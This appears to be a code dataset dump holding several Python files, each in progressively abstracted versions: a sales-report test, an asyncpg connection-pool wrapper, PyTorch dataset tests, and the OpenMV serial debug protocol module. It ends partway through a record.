"<import token>\n<assignment token>\n<code token>\n<import token>\n<assignment token>\n\n\nclass TestSalesReport:\n <function token>\n <function token>\n\n def test_generate_report(self):\n report_lines = process_all(records)\n assert '\\n'.join(report_lines) == \"\"\"Group: 001\n Product: 0001 Value: 12\n Product: 0012 Value: 1032\n Group total: 1044\n\nGroup: 007\n Product: 0009 Value: 207\n Product: 0112 Value: 12119\n Product: 1009 Value: 200\n Group total: 12526\n\nTotal: 13570\"\"\"\n",
"<import token>\n<assignment token>\n<code token>\n<import token>\n<assignment token>\n\n\nclass TestSalesReport:\n <function token>\n <function token>\n <function token>\n",
"<import token>\n<assignment token>\n<code token>\n<import token>\n<assignment token>\n<class token>\n"
] | false |
99,816 | da64ecab1447abc75b238b8effb6c516ffb36d07 | from asyncpg import connect, InterfaceError, create_pool
import logging
import asyncio
from async_timeout import timeout
class PSQLConnector():
def __init__(self, conf):
self.loop = asyncio.get_event_loop()
self.sync_type = conf["sync_type"]
self.conf = conf
self.pool = self.loop.run_until_complete(self._create_pool())
async def _create_pool(self):
pool = await create_pool(
database=self.conf["database"],
user=self.conf["user"],
password=self.conf["password"],
host=self.conf.get("host", "localhost"),
port=self.conf.get("port", 5432),
max_inactive_connection_lifetime=0.05)
logging.info('Successfully connected with local PSQL')
return pool
async def _select_single_execute(self, query):
value = await self.pool.fetch(query, timeout=0.05)
return value[0][0]
async def select_single(self, query):
try:
async with timeout(0.05):
return await self._select_single_execute(query)
except InterfaceError as e:
if "connection already closed" in str(e).lower():
self.pool = self.loop.run_until_complete(self._create_pool())
async with timeout(0.05):
return await self._select_single_execute(query)
else:
raise
def close(self):
self.conn.close()
| [
"from asyncpg import connect, InterfaceError, create_pool\nimport logging\nimport asyncio\nfrom async_timeout import timeout\n\n\nclass PSQLConnector():\n def __init__(self, conf):\n self.loop = asyncio.get_event_loop()\n self.sync_type = conf[\"sync_type\"]\n self.conf = conf\n self.pool = self.loop.run_until_complete(self._create_pool())\n\n async def _create_pool(self):\n pool = await create_pool(\n database=self.conf[\"database\"],\n user=self.conf[\"user\"],\n password=self.conf[\"password\"],\n host=self.conf.get(\"host\", \"localhost\"),\n port=self.conf.get(\"port\", 5432),\n max_inactive_connection_lifetime=0.05)\n\n logging.info('Successfully connected with local PSQL')\n return pool\n\n async def _select_single_execute(self, query):\n value = await self.pool.fetch(query, timeout=0.05)\n return value[0][0]\n\n async def select_single(self, query):\n try:\n async with timeout(0.05):\n return await self._select_single_execute(query)\n except InterfaceError as e:\n if \"connection already closed\" in str(e).lower():\n self.pool = self.loop.run_until_complete(self._create_pool())\n async with timeout(0.05):\n return await self._select_single_execute(query)\n else:\n raise\n\n def close(self):\n self.conn.close()\n",
"from asyncpg import connect, InterfaceError, create_pool\nimport logging\nimport asyncio\nfrom async_timeout import timeout\n\n\nclass PSQLConnector:\n\n def __init__(self, conf):\n self.loop = asyncio.get_event_loop()\n self.sync_type = conf['sync_type']\n self.conf = conf\n self.pool = self.loop.run_until_complete(self._create_pool())\n\n async def _create_pool(self):\n pool = await create_pool(database=self.conf['database'], user=self.\n conf['user'], password=self.conf['password'], host=self.conf.\n get('host', 'localhost'), port=self.conf.get('port', 5432),\n max_inactive_connection_lifetime=0.05)\n logging.info('Successfully connected with local PSQL')\n return pool\n\n async def _select_single_execute(self, query):\n value = await self.pool.fetch(query, timeout=0.05)\n return value[0][0]\n\n async def select_single(self, query):\n try:\n async with timeout(0.05):\n return await self._select_single_execute(query)\n except InterfaceError as e:\n if 'connection already closed' in str(e).lower():\n self.pool = self.loop.run_until_complete(self._create_pool())\n async with timeout(0.05):\n return await self._select_single_execute(query)\n else:\n raise\n\n def close(self):\n self.conn.close()\n",
"<import token>\n\n\nclass PSQLConnector:\n\n def __init__(self, conf):\n self.loop = asyncio.get_event_loop()\n self.sync_type = conf['sync_type']\n self.conf = conf\n self.pool = self.loop.run_until_complete(self._create_pool())\n\n async def _create_pool(self):\n pool = await create_pool(database=self.conf['database'], user=self.\n conf['user'], password=self.conf['password'], host=self.conf.\n get('host', 'localhost'), port=self.conf.get('port', 5432),\n max_inactive_connection_lifetime=0.05)\n logging.info('Successfully connected with local PSQL')\n return pool\n\n async def _select_single_execute(self, query):\n value = await self.pool.fetch(query, timeout=0.05)\n return value[0][0]\n\n async def select_single(self, query):\n try:\n async with timeout(0.05):\n return await self._select_single_execute(query)\n except InterfaceError as e:\n if 'connection already closed' in str(e).lower():\n self.pool = self.loop.run_until_complete(self._create_pool())\n async with timeout(0.05):\n return await self._select_single_execute(query)\n else:\n raise\n\n def close(self):\n self.conn.close()\n",
"<import token>\n\n\nclass PSQLConnector:\n\n def __init__(self, conf):\n self.loop = asyncio.get_event_loop()\n self.sync_type = conf['sync_type']\n self.conf = conf\n self.pool = self.loop.run_until_complete(self._create_pool())\n\n async def _create_pool(self):\n pool = await create_pool(database=self.conf['database'], user=self.\n conf['user'], password=self.conf['password'], host=self.conf.\n get('host', 'localhost'), port=self.conf.get('port', 5432),\n max_inactive_connection_lifetime=0.05)\n logging.info('Successfully connected with local PSQL')\n return pool\n\n async def _select_single_execute(self, query):\n value = await self.pool.fetch(query, timeout=0.05)\n return value[0][0]\n\n async def select_single(self, query):\n try:\n async with timeout(0.05):\n return await self._select_single_execute(query)\n except InterfaceError as e:\n if 'connection already closed' in str(e).lower():\n self.pool = self.loop.run_until_complete(self._create_pool())\n async with timeout(0.05):\n return await self._select_single_execute(query)\n else:\n raise\n <function token>\n",
"<import token>\n\n\nclass PSQLConnector:\n <function token>\n\n async def _create_pool(self):\n pool = await create_pool(database=self.conf['database'], user=self.\n conf['user'], password=self.conf['password'], host=self.conf.\n get('host', 'localhost'), port=self.conf.get('port', 5432),\n max_inactive_connection_lifetime=0.05)\n logging.info('Successfully connected with local PSQL')\n return pool\n\n async def _select_single_execute(self, query):\n value = await self.pool.fetch(query, timeout=0.05)\n return value[0][0]\n\n async def select_single(self, query):\n try:\n async with timeout(0.05):\n return await self._select_single_execute(query)\n except InterfaceError as e:\n if 'connection already closed' in str(e).lower():\n self.pool = self.loop.run_until_complete(self._create_pool())\n async with timeout(0.05):\n return await self._select_single_execute(query)\n else:\n raise\n <function token>\n",
"<import token>\n<class token>\n"
] | false |
99,817 | 964b935334b2f8e1a1b5926be6885b33e977a9c6 |
from torch.utils.data import Dataset, DataLoader
import numpy as np
import pandas as pd
from task1 import get_slice_set
from task2 import HeartDataset, np_collate_dict_to_tuple
def test_task2_output_2_elements(batch):
print('testing: 2 elements in batch')
assert len(batch)==2
print('passed')
def test_task2_output_1st_images(batch):
print('testing: batch is an numpy array')
assert isinstance(batch[0], np.ndarray)
print('passed')
print('testing: batch is a 2D (color or grayscale) numpy array')
assert (len(batch[0].shape) in (2,3))
print('passed')
def test_shuffling(hdset, shuffle=True):
print(f"testing for shuffle={shuffle}")
num_reps = 3
first_batches = []
for rep in range(num_reps):
hdloader = DataLoader(hdset, batch_size=8, shuffle=shuffle,
collate_fn=np_collate_dict_to_tuple)
for x in hdloader:
break
first_batches.append(x[0])
imask_sum_first_batch = [tuple(x.sum(-1).sum(-1)) for x in first_batches]
assert (len(set(imask_sum_first_batch)) == num_reps) == shuffle
print('passed')
if __name__ == '__main__':
dir_data = 'final_data'
fn_link = f'{dir_data}/link.csv'
metadata = pd.read_csv(fn_link)
print( f'{metadata.shape[0]} series parsed')
filenames = get_slice_set(metadata, dir_data)
print( f'{filenames.shape[0]} files parsed')
hdset = HeartDataset(filenames)
# basic tests
hdloader = DataLoader(hdset, batch_size=8, shuffle=True,
collate_fn=np_collate_dict_to_tuple)
for batch in hdloader:
break
test_task2_output_2_elements(batch)
test_task2_output_1st_images(batch)
test_shuffling(hdset, shuffle = True)
test_shuffling(hdset, shuffle = False)
| [
"\nfrom torch.utils.data import Dataset, DataLoader\nimport numpy as np\nimport pandas as pd\n\nfrom task1 import get_slice_set\nfrom task2 import HeartDataset, np_collate_dict_to_tuple\n\n\ndef test_task2_output_2_elements(batch):\n print('testing: 2 elements in batch')\n assert len(batch)==2\n print('passed')\n \n\ndef test_task2_output_1st_images(batch):\n print('testing: batch is an numpy array')\n assert isinstance(batch[0], np.ndarray)\n print('passed')\n\n print('testing: batch is a 2D (color or grayscale) numpy array')\n assert (len(batch[0].shape) in (2,3))\n print('passed')\n\ndef test_shuffling(hdset, shuffle=True):\n print(f\"testing for shuffle={shuffle}\")\n num_reps = 3\n first_batches = []\n for rep in range(num_reps):\n hdloader = DataLoader(hdset, batch_size=8, shuffle=shuffle,\n collate_fn=np_collate_dict_to_tuple)\n for x in hdloader:\n break\n first_batches.append(x[0])\n\n imask_sum_first_batch = [tuple(x.sum(-1).sum(-1)) for x in first_batches]\n \n assert (len(set(imask_sum_first_batch)) == num_reps) == shuffle\n print('passed')\n\n\nif __name__ == '__main__':\n\n dir_data = 'final_data'\n fn_link = f'{dir_data}/link.csv'\n\n metadata = pd.read_csv(fn_link)\n print( f'{metadata.shape[0]} series parsed')\n\n filenames = get_slice_set(metadata, dir_data)\n print( f'{filenames.shape[0]} files parsed')\n\n hdset = HeartDataset(filenames)\n\n # basic tests\n hdloader = DataLoader(hdset, batch_size=8, shuffle=True,\n collate_fn=np_collate_dict_to_tuple)\n for batch in hdloader:\n break\n\n test_task2_output_2_elements(batch)\n\n test_task2_output_1st_images(batch)\n\n test_shuffling(hdset, shuffle = True)\n test_shuffling(hdset, shuffle = False)\n\n",
"from torch.utils.data import Dataset, DataLoader\nimport numpy as np\nimport pandas as pd\nfrom task1 import get_slice_set\nfrom task2 import HeartDataset, np_collate_dict_to_tuple\n\n\ndef test_task2_output_2_elements(batch):\n print('testing: 2 elements in batch')\n assert len(batch) == 2\n print('passed')\n\n\ndef test_task2_output_1st_images(batch):\n print('testing: batch is an numpy array')\n assert isinstance(batch[0], np.ndarray)\n print('passed')\n print('testing: batch is a 2D (color or grayscale) numpy array')\n assert len(batch[0].shape) in (2, 3)\n print('passed')\n\n\ndef test_shuffling(hdset, shuffle=True):\n print(f'testing for shuffle={shuffle}')\n num_reps = 3\n first_batches = []\n for rep in range(num_reps):\n hdloader = DataLoader(hdset, batch_size=8, shuffle=shuffle,\n collate_fn=np_collate_dict_to_tuple)\n for x in hdloader:\n break\n first_batches.append(x[0])\n imask_sum_first_batch = [tuple(x.sum(-1).sum(-1)) for x in first_batches]\n assert (len(set(imask_sum_first_batch)) == num_reps) == shuffle\n print('passed')\n\n\nif __name__ == '__main__':\n dir_data = 'final_data'\n fn_link = f'{dir_data}/link.csv'\n metadata = pd.read_csv(fn_link)\n print(f'{metadata.shape[0]} series parsed')\n filenames = get_slice_set(metadata, dir_data)\n print(f'{filenames.shape[0]} files parsed')\n hdset = HeartDataset(filenames)\n hdloader = DataLoader(hdset, batch_size=8, shuffle=True, collate_fn=\n np_collate_dict_to_tuple)\n for batch in hdloader:\n break\n test_task2_output_2_elements(batch)\n test_task2_output_1st_images(batch)\n test_shuffling(hdset, shuffle=True)\n test_shuffling(hdset, shuffle=False)\n",
"<import token>\n\n\ndef test_task2_output_2_elements(batch):\n print('testing: 2 elements in batch')\n assert len(batch) == 2\n print('passed')\n\n\ndef test_task2_output_1st_images(batch):\n print('testing: batch is an numpy array')\n assert isinstance(batch[0], np.ndarray)\n print('passed')\n print('testing: batch is a 2D (color or grayscale) numpy array')\n assert len(batch[0].shape) in (2, 3)\n print('passed')\n\n\ndef test_shuffling(hdset, shuffle=True):\n print(f'testing for shuffle={shuffle}')\n num_reps = 3\n first_batches = []\n for rep in range(num_reps):\n hdloader = DataLoader(hdset, batch_size=8, shuffle=shuffle,\n collate_fn=np_collate_dict_to_tuple)\n for x in hdloader:\n break\n first_batches.append(x[0])\n imask_sum_first_batch = [tuple(x.sum(-1).sum(-1)) for x in first_batches]\n assert (len(set(imask_sum_first_batch)) == num_reps) == shuffle\n print('passed')\n\n\nif __name__ == '__main__':\n dir_data = 'final_data'\n fn_link = f'{dir_data}/link.csv'\n metadata = pd.read_csv(fn_link)\n print(f'{metadata.shape[0]} series parsed')\n filenames = get_slice_set(metadata, dir_data)\n print(f'{filenames.shape[0]} files parsed')\n hdset = HeartDataset(filenames)\n hdloader = DataLoader(hdset, batch_size=8, shuffle=True, collate_fn=\n np_collate_dict_to_tuple)\n for batch in hdloader:\n break\n test_task2_output_2_elements(batch)\n test_task2_output_1st_images(batch)\n test_shuffling(hdset, shuffle=True)\n test_shuffling(hdset, shuffle=False)\n",
"<import token>\n\n\ndef test_task2_output_2_elements(batch):\n print('testing: 2 elements in batch')\n assert len(batch) == 2\n print('passed')\n\n\ndef test_task2_output_1st_images(batch):\n print('testing: batch is an numpy array')\n assert isinstance(batch[0], np.ndarray)\n print('passed')\n print('testing: batch is a 2D (color or grayscale) numpy array')\n assert len(batch[0].shape) in (2, 3)\n print('passed')\n\n\ndef test_shuffling(hdset, shuffle=True):\n print(f'testing for shuffle={shuffle}')\n num_reps = 3\n first_batches = []\n for rep in range(num_reps):\n hdloader = DataLoader(hdset, batch_size=8, shuffle=shuffle,\n collate_fn=np_collate_dict_to_tuple)\n for x in hdloader:\n break\n first_batches.append(x[0])\n imask_sum_first_batch = [tuple(x.sum(-1).sum(-1)) for x in first_batches]\n assert (len(set(imask_sum_first_batch)) == num_reps) == shuffle\n print('passed')\n\n\n<code token>\n",
"<import token>\n\n\ndef test_task2_output_2_elements(batch):\n print('testing: 2 elements in batch')\n assert len(batch) == 2\n print('passed')\n\n\ndef test_task2_output_1st_images(batch):\n print('testing: batch is an numpy array')\n assert isinstance(batch[0], np.ndarray)\n print('passed')\n print('testing: batch is a 2D (color or grayscale) numpy array')\n assert len(batch[0].shape) in (2, 3)\n print('passed')\n\n\n<function token>\n<code token>\n",
"<import token>\n\n\ndef test_task2_output_2_elements(batch):\n print('testing: 2 elements in batch')\n assert len(batch) == 2\n print('passed')\n\n\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<function token>\n<function token>\n<function token>\n<code token>\n"
] | false |
99,818 | 62aec5a2a10b37ba3b321a1731dcdb0c45768ffb | #!/usr/bin/env python2
# This file is part of the OpenMV project.
#
# Copyright (c) 2013-2021 Ibrahim Abdelkader <[email protected]>
# Copyright (c) 2013-2021 Kwabena W. Agyeman <[email protected]>
#
# This work is licensed under the MIT license, see the file LICENSE for details.
#
# Openmv module.
import struct
import sys,time
import serial
import platform
import numpy as np
from PIL import Image
__serial = None
__FB_HDR_SIZE =12
# USB Debug commands
__USBDBG_CMD = 48
__USBDBG_FW_VERSION = 0x80
__USBDBG_FRAME_SIZE = 0x81
__USBDBG_FRAME_DUMP = 0x82
__USBDBG_ARCH_STR = 0x83
__USBDBG_SCRIPT_EXEC = 0x05
__USBDBG_SCRIPT_STOP = 0x06
__USBDBG_SCRIPT_SAVE = 0x07
__USBDBG_SCRIPT_RUNNING = 0x87
__USBDBG_TEMPLATE_SAVE = 0x08
__USBDBG_DESCRIPTOR_SAVE= 0x09
__USBDBG_ATTR_READ = 0x8A
__USBDBG_ATTR_WRITE = 0x0B
__USBDBG_SYS_RESET = 0x0C
__USBDBG_SYS_RESET_TO_BL= 0x0E
__USBDBG_FB_ENABLE = 0x0D
__USBDBG_TX_BUF_LEN = 0x8E
__USBDBG_TX_BUF = 0x8F
ATTR_CONTRAST =0
ATTR_BRIGHTNESS =1
ATTR_SATURATION =2
ATTR_GAINCEILING=3
__BOOTLDR_START = 0xABCD0001
__BOOTLDR_RESET = 0xABCD0002
__BOOTLDR_ERASE = 0xABCD0004
__BOOTLDR_WRITE = 0xABCD0008
def init(port, baudrate=921600, timeout=0.3):
global __serial
# open CDC port
__serial = serial.Serial(port, baudrate=baudrate, timeout=timeout)
def disconnect():
global __serial
try:
if (__serial):
__serial.close()
__serial = None
except:
pass
def set_timeout(timeout):
__serial.timeout = timeout
def fb_size():
# read fb header
__serial.write(struct.pack("<BBI", __USBDBG_CMD, __USBDBG_FRAME_SIZE, __FB_HDR_SIZE))
return struct.unpack("III", __serial.read(12))
def fb_dump():
size = fb_size()
if (not size[0]):
# frame not ready
return None
if (size[2] > 2): #JPEG
num_bytes = size[2]
else:
num_bytes = size[0]*size[1]*size[2]
# read fb data
__serial.write(struct.pack("<BBI", __USBDBG_CMD, __USBDBG_FRAME_DUMP, num_bytes))
buff = __serial.read(num_bytes)
if size[2] == 1: # Grayscale
y = np.fromstring(buff, dtype=np.uint8)
buff = np.column_stack((y, y, y))
elif size[2] == 2: # RGB565
arr = np.fromstring(buff, dtype=np.uint16).newbyteorder('S')
r = (((arr & 0xF800) >>11)*255.0/31.0).astype(np.uint8)
g = (((arr & 0x07E0) >>5) *255.0/63.0).astype(np.uint8)
b = (((arr & 0x001F) >>0) *255.0/31.0).astype(np.uint8)
buff = np.column_stack((r,g,b))
else: # JPEG
try:
buff = np.asarray(Image.frombuffer("RGB", size[0:2], buff, "jpeg", "RGB", ""))
except Exception as e:
print ("JPEG decode error (%s)"%(e))
return None
if (buff.size != (size[0]*size[1]*3)):
return None
return (size[0], size[1], buff.reshape((size[1], size[0], 3)))
def exec_script(buf):
__serial.write(struct.pack("<BBI", __USBDBG_CMD, __USBDBG_SCRIPT_EXEC, len(buf)))
__serial.write(buf.encode())
def stop_script():
__serial.write(struct.pack("<BBI", __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))
def script_running():
__serial.write(struct.pack("<BBI", __USBDBG_CMD, __USBDBG_SCRIPT_RUNNING, 4))
return struct.unpack("I", __serial.read(4))[0]
def save_template(x, y, w, h, path):
buf = struct.pack("IIII", x, y, w, h) + path
__serial.write(struct.pack("<BBI", __USBDBG_CMD, __USBDBG_TEMPLATE_SAVE, len(buf)))
__serial.write(buf)
def save_descriptor(x, y, w, h, path):
buf = struct.pack("HHHH", x, y, w, h) + path
__serial.write(struct.pack("<BBI", __USBDBG_CMD, __USBDBG_DESCRIPTOR_SAVE, len(buf)))
__serial.write(buf)
def set_attr(attr, value):
__serial.write(struct.pack("<BBI", __USBDBG_CMD, __USBDBG_ATTR_WRITE, 8))
__serial.write(struct.pack("<II", attr, value))
def get_attr(attr):
__serial.write(struct.pack("<BBIh", __USBDBG_CMD, __USBDBG_ATTR_READ, 1, attr))
return __serial.read(1)
def reset():
__serial.write(struct.pack("<BBI", __USBDBG_CMD, __USBDBG_SYS_RESET, 0))
def reset_to_bl():
__serial.write(struct.pack("<BBI", __USBDBG_CMD, __USBDBG_SYS_RESET_TO_BL, 0))
def bootloader_start():
__serial.write(struct.pack("<I", __BOOTLDR_START))
return struct.unpack("I", __serial.read(4))[0] == __BOOTLDR_START
def bootloader_reset():
__serial.write(struct.pack("<I", __BOOTLDR_RESET))
def flash_erase(sector):
__serial.write(struct.pack("<II", __BOOTLDR_ERASE, sector))
def flash_write(buf):
__serial.write(struct.pack("<I", __BOOTLDR_WRITE) + buf)
def tx_buf_len():
__serial.write(struct.pack("<BBI", __USBDBG_CMD, __USBDBG_TX_BUF_LEN, 4))
return struct.unpack("I", __serial.read(4))[0]
def tx_buf(bytes):
__serial.write(struct.pack("<BBI", __USBDBG_CMD, __USBDBG_TX_BUF, bytes))
return __serial.read(bytes)
def fw_version():
__serial.write(struct.pack("<BBI", __USBDBG_CMD, __USBDBG_FW_VERSION, 12))
return struct.unpack("III", __serial.read(12))
def enable_fb(enable):
__serial.write(struct.pack("<BBI", __USBDBG_CMD, __USBDBG_FB_ENABLE, 4))
__serial.write(struct.pack("<I", enable))
def arch_str():
__serial.write(struct.pack("<BBI", __USBDBG_CMD, __USBDBG_ARCH_STR, 64))
return __serial.read(64).split('\0', 1)[0]
if __name__ == '__main__':
if len(sys.argv)!= 3:
print ('usage: pyopenmv.py <port> <script>')
sys.exit(1)
with open(sys.argv[2], 'r') as fin:
buf = fin.read()
disconnect()
init(sys.argv[1])
stop_script()
exec_script(buf)
tx_len = tx_buf_len()
time.sleep(0.250)
if (tx_len):
print(tx_buf(tx_len).decode())
disconnect()
| [
"#!/usr/bin/env python2\n# This file is part of the OpenMV project.\n#\n# Copyright (c) 2013-2021 Ibrahim Abdelkader <[email protected]>\n# Copyright (c) 2013-2021 Kwabena W. Agyeman <[email protected]>\n#\n# This work is licensed under the MIT license, see the file LICENSE for details.\n#\n# Openmv module.\n\nimport struct\nimport sys,time\nimport serial\nimport platform\nimport numpy as np\nfrom PIL import Image\n\n__serial = None\n__FB_HDR_SIZE =12\n\n# USB Debug commands\n__USBDBG_CMD = 48\n__USBDBG_FW_VERSION = 0x80\n__USBDBG_FRAME_SIZE = 0x81\n__USBDBG_FRAME_DUMP = 0x82\n__USBDBG_ARCH_STR = 0x83\n__USBDBG_SCRIPT_EXEC = 0x05\n__USBDBG_SCRIPT_STOP = 0x06\n__USBDBG_SCRIPT_SAVE = 0x07\n__USBDBG_SCRIPT_RUNNING = 0x87\n__USBDBG_TEMPLATE_SAVE = 0x08\n__USBDBG_DESCRIPTOR_SAVE= 0x09\n__USBDBG_ATTR_READ = 0x8A\n__USBDBG_ATTR_WRITE = 0x0B\n__USBDBG_SYS_RESET = 0x0C\n__USBDBG_SYS_RESET_TO_BL= 0x0E\n__USBDBG_FB_ENABLE = 0x0D\n__USBDBG_TX_BUF_LEN = 0x8E\n__USBDBG_TX_BUF = 0x8F\n\nATTR_CONTRAST =0\nATTR_BRIGHTNESS =1\nATTR_SATURATION =2\nATTR_GAINCEILING=3\n\n__BOOTLDR_START = 0xABCD0001\n__BOOTLDR_RESET = 0xABCD0002\n__BOOTLDR_ERASE = 0xABCD0004\n__BOOTLDR_WRITE = 0xABCD0008\n\ndef init(port, baudrate=921600, timeout=0.3):\n global __serial\n # open CDC port\n __serial = serial.Serial(port, baudrate=baudrate, timeout=timeout)\n\ndef disconnect():\n global __serial\n try:\n if (__serial):\n __serial.close()\n __serial = None\n except:\n pass\n\ndef set_timeout(timeout):\n __serial.timeout = timeout\n\ndef fb_size():\n # read fb header\n __serial.write(struct.pack(\"<BBI\", __USBDBG_CMD, __USBDBG_FRAME_SIZE, __FB_HDR_SIZE))\n return struct.unpack(\"III\", __serial.read(12))\n\ndef fb_dump():\n size = fb_size()\n\n if (not size[0]):\n # frame not ready\n return None\n\n if (size[2] > 2): #JPEG\n num_bytes = size[2]\n else:\n num_bytes = size[0]*size[1]*size[2]\n\n # read fb data\n __serial.write(struct.pack(\"<BBI\", __USBDBG_CMD, __USBDBG_FRAME_DUMP, num_bytes))\n buff = __serial.read(num_bytes)\n\n if size[2] == 1: # Grayscale\n y = np.fromstring(buff, dtype=np.uint8)\n buff = np.column_stack((y, y, y))\n elif size[2] == 2: # RGB565\n arr = np.fromstring(buff, dtype=np.uint16).newbyteorder('S')\n r = (((arr & 0xF800) >>11)*255.0/31.0).astype(np.uint8)\n g = (((arr & 0x07E0) >>5) *255.0/63.0).astype(np.uint8)\n b = (((arr & 0x001F) >>0) *255.0/31.0).astype(np.uint8)\n buff = np.column_stack((r,g,b))\n else: # JPEG\n try:\n buff = np.asarray(Image.frombuffer(\"RGB\", size[0:2], buff, \"jpeg\", \"RGB\", \"\"))\n except Exception as e:\n print (\"JPEG decode error (%s)\"%(e))\n return None\n\n if (buff.size != (size[0]*size[1]*3)):\n return None\n\n return (size[0], size[1], buff.reshape((size[1], size[0], 3)))\n\ndef exec_script(buf):\n __serial.write(struct.pack(\"<BBI\", __USBDBG_CMD, __USBDBG_SCRIPT_EXEC, len(buf)))\n __serial.write(buf.encode())\n\ndef stop_script():\n __serial.write(struct.pack(\"<BBI\", __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\ndef script_running():\n __serial.write(struct.pack(\"<BBI\", __USBDBG_CMD, __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack(\"I\", __serial.read(4))[0]\n\ndef save_template(x, y, w, h, path):\n buf = struct.pack(\"IIII\", x, y, w, h) + path\n __serial.write(struct.pack(\"<BBI\", __USBDBG_CMD, __USBDBG_TEMPLATE_SAVE, len(buf)))\n __serial.write(buf)\n\ndef save_descriptor(x, y, w, h, path):\n buf = struct.pack(\"HHHH\", x, y, w, h) + path\n __serial.write(struct.pack(\"<BBI\", __USBDBG_CMD, __USBDBG_DESCRIPTOR_SAVE, len(buf)))\n __serial.write(buf)\n\ndef set_attr(attr, value):\n __serial.write(struct.pack(\"<BBI\", __USBDBG_CMD, __USBDBG_ATTR_WRITE, 8))\n __serial.write(struct.pack(\"<II\", attr, value))\n\ndef get_attr(attr):\n __serial.write(struct.pack(\"<BBIh\", __USBDBG_CMD, __USBDBG_ATTR_READ, 1, attr))\n return __serial.read(1)\n\ndef reset():\n __serial.write(struct.pack(\"<BBI\", __USBDBG_CMD, __USBDBG_SYS_RESET, 0))\n\ndef reset_to_bl():\n __serial.write(struct.pack(\"<BBI\", __USBDBG_CMD, __USBDBG_SYS_RESET_TO_BL, 0))\n\ndef bootloader_start():\n __serial.write(struct.pack(\"<I\", __BOOTLDR_START))\n return struct.unpack(\"I\", __serial.read(4))[0] == __BOOTLDR_START\n\ndef bootloader_reset():\n __serial.write(struct.pack(\"<I\", __BOOTLDR_RESET))\n\ndef flash_erase(sector):\n __serial.write(struct.pack(\"<II\", __BOOTLDR_ERASE, sector))\n\ndef flash_write(buf):\n __serial.write(struct.pack(\"<I\", __BOOTLDR_WRITE) + buf)\n\ndef tx_buf_len():\n __serial.write(struct.pack(\"<BBI\", __USBDBG_CMD, __USBDBG_TX_BUF_LEN, 4))\n return struct.unpack(\"I\", __serial.read(4))[0]\n\ndef tx_buf(bytes):\n __serial.write(struct.pack(\"<BBI\", __USBDBG_CMD, __USBDBG_TX_BUF, bytes))\n return __serial.read(bytes)\n\ndef fw_version():\n __serial.write(struct.pack(\"<BBI\", __USBDBG_CMD, __USBDBG_FW_VERSION, 12))\n return struct.unpack(\"III\", __serial.read(12))\n\ndef enable_fb(enable):\n __serial.write(struct.pack(\"<BBI\", __USBDBG_CMD, __USBDBG_FB_ENABLE, 4))\n __serial.write(struct.pack(\"<I\", enable))\n\ndef arch_str():\n __serial.write(struct.pack(\"<BBI\", __USBDBG_CMD, __USBDBG_ARCH_STR, 64))\n return __serial.read(64).split('\\0', 1)[0]\n\nif __name__ == '__main__':\n if len(sys.argv)!= 3:\n print ('usage: pyopenmv.py <port> <script>')\n sys.exit(1)\n\n with open(sys.argv[2], 'r') as fin:\n buf = fin.read()\n\n disconnect()\n init(sys.argv[1])\n stop_script()\n exec_script(buf)\n tx_len = tx_buf_len()\n time.sleep(0.250)\n if (tx_len):\n print(tx_buf(tx_len).decode())\n disconnect()\n",
"import struct\nimport sys, time\nimport serial\nimport platform\nimport numpy as np\nfrom PIL import Image\n__serial = None\n__FB_HDR_SIZE = 12\n__USBDBG_CMD = 48\n__USBDBG_FW_VERSION = 128\n__USBDBG_FRAME_SIZE = 129\n__USBDBG_FRAME_DUMP = 130\n__USBDBG_ARCH_STR = 131\n__USBDBG_SCRIPT_EXEC = 5\n__USBDBG_SCRIPT_STOP = 6\n__USBDBG_SCRIPT_SAVE = 7\n__USBDBG_SCRIPT_RUNNING = 135\n__USBDBG_TEMPLATE_SAVE = 8\n__USBDBG_DESCRIPTOR_SAVE = 9\n__USBDBG_ATTR_READ = 138\n__USBDBG_ATTR_WRITE = 11\n__USBDBG_SYS_RESET = 12\n__USBDBG_SYS_RESET_TO_BL = 14\n__USBDBG_FB_ENABLE = 13\n__USBDBG_TX_BUF_LEN = 142\n__USBDBG_TX_BUF = 143\nATTR_CONTRAST = 0\nATTR_BRIGHTNESS = 1\nATTR_SATURATION = 2\nATTR_GAINCEILING = 3\n__BOOTLDR_START = 2882338817\n__BOOTLDR_RESET = 2882338818\n__BOOTLDR_ERASE = 2882338820\n__BOOTLDR_WRITE = 2882338824\n\n\ndef init(port, baudrate=921600, timeout=0.3):\n global __serial\n __serial = serial.Serial(port, baudrate=baudrate, timeout=timeout)\n\n\ndef disconnect():\n global __serial\n try:\n if __serial:\n __serial.close()\n __serial = None\n except:\n pass\n\n\ndef set_timeout(timeout):\n __serial.timeout = timeout\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\ndef fb_dump():\n size = fb_size()\n if not size[0]:\n return None\n if size[2] > 2:\n num_bytes = size[2]\n else:\n num_bytes = size[0] * size[1] * size[2]\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_DUMP,\n num_bytes))\n buff = __serial.read(num_bytes)\n if size[2] == 1:\n y = np.fromstring(buff, dtype=np.uint8)\n buff = np.column_stack((y, y, y))\n elif size[2] == 2:\n arr = np.fromstring(buff, dtype=np.uint16).newbyteorder('S')\n r = (((arr & 63488) >> 11) * 255.0 / 31.0).astype(np.uint8)\n g = (((arr & 2016) >> 5) * 255.0 / 63.0).astype(np.uint8)\n b = (((arr & 31) >> 0) * 255.0 / 31.0).astype(np.uint8)\n buff = np.column_stack((r, g, b))\n else:\n try:\n buff = np.asarray(Image.frombuffer('RGB', size[0:2], buff,\n 'jpeg', 'RGB', ''))\n except Exception as e:\n print('JPEG decode error (%s)' % e)\n return None\n if buff.size != size[0] * size[1] * 3:\n return None\n return size[0], size[1], buff.reshape((size[1], size[0], 3))\n\n\ndef exec_script(buf):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_EXEC,\n len(buf)))\n __serial.write(buf.encode())\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\ndef save_template(x, y, w, h, path):\n buf = struct.pack('IIII', x, y, w, h) + 